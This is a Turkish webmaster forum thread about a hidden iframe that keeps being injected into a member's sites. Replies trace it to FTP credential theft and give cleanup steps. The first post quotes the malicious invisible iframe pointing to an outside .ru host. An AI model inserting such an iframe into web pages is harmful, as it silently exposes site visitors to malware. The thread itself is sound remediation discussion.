Neler yeni

Yeni mesajlar Yeni konular En çok mesaj En çok tepki En çok görüntülenen

iframe belası

Ufuk Cebeci

🏆Pro Tasarımcı🏆
merhaba arkadaşlar sitelere sürekli olarak

<iframe src="https://x9e.ru:8080/index.php" width=157 height=195 style="visibility: hidden"></iframe>

bu şekilde iframe kodları giriyor ve temizlendikten sonra ertesi gün tekrar giriyor bir türlü önüne geçemedik nasıl engelleyebileceğimiz hakkında bilgisi olan var mı.

Benzer konular

acemii

🌱Yeni Üye🌱
webmaster arkadaşların bilmesi lazım bende merak ettim .

turkejderi

🌱Yeni Üye🌱
Benim reseller hesabıma da girdi çok büyük zarara yol açmıştı.Bu iframe virüsü bilgisayarınızdaki ftp yazılmı ile girmekte.Bunun için crackli olmayan ücretsiz bir versiyon kullanıın filezilla gibi.Bilgisayarınızı kaspersky güncel virüs programı ile baştan sona taratın.

Virüs sitenizdeki tüm index.php,index.html,index.asp gibi dosyalara bulaşmıştır.Bilgisayarınızdaki tüm dosyaları ftp aracılığı ile bilgisayarınıza indirin ve virüs taramasından geçirin.

Ayrıca Advanced Find and Replace 4 adlı bir program var.Bu program sitenizdeki tüm dosyaların içindeki kodları tespit edip değiştirebilir veya silebilirsiniz.

Ufuk Cebeci

🏆Pro Tasarımcı🏆
Benim reseller hesabıma da girdi çok büyük zarara yol açmıştı.Bu iframe virüsü bilgisayarınızdaki ftp yazılmı ile girmekte.Bunun için crackli olmayan ücretsiz bir versiyon kullanıın filezilla gibi.Bilgisayarınızı kaspersky güncel virüs programı ile baştan sona taratın.

Virüs sitenizdeki tüm index.php,index.html,index.asp gibi dosyalara bulaşmıştır.Bilgisayarınızdaki tüm dosyaları ftp aracılığı ile bilgisayarınıza indirin ve virüs taramasından geçirin.

Ayrıca Advanced Find and Replace 4 adlı bir program var.Bu program sitenizdeki tüm dosyaların içindeki kodları tespit edip değiştirebilir veya silebilirsiniz.

filezilla kullanıyoruz tüm pc lerde ama Advanced Find and Replace 4 programını denemedim daha önce ilginize teşekkürler deneyeceğim.

Gökhan TEKİN

ARTniyetli
👑Efsanevi Grafiker👑
Tüm index dosyalarına yayılan bir kod bu , virüs te diyebiliriz bir nebze ve işin kötüsü google sizin sayfanızda bu konu gördüğü için büyük bir olasılıkla siteniz hakkında - eksi puan olarak görecektir ve sitenize google arama sonuçlarından ulaşırken tehlikeli içerikli site olarak belirleyecektir. Yapacağınız şey şunlar, tüm index dosyalarından bu kodu bulup silmek (klasör klasör hostunuzdaki tüm dosyaları inceleyip siliniz.) . Daha sonra eğer ssh yetkiniz var ise ssh den bağlanıp linux veya windows ise güçlü bir virüs programı ile tarama yaptırınız, eğer ssh yetkiniz yoksa yada sunucu bilginiz bu dediğimi yapacak kadar yoksa lütfen host satıcınız ile iletişime geçiniz, eğer bunlara rağmen hala sorun devam ediyorsa özel mesaj yoluyla bu konuyu bana hatırlatın gelişmeleri lütfen özel mesaj ile değil buradan yazarsanız sizden sonra gelenlerinde dertlerine çare olursunuz.

Saygılarımla...

Ufuk Cebeci

🏆Pro Tasarımcı🏆
Teşekkürler Gökhan bey. konu ile ilgili gelişmeleri buradan paylaşacağım.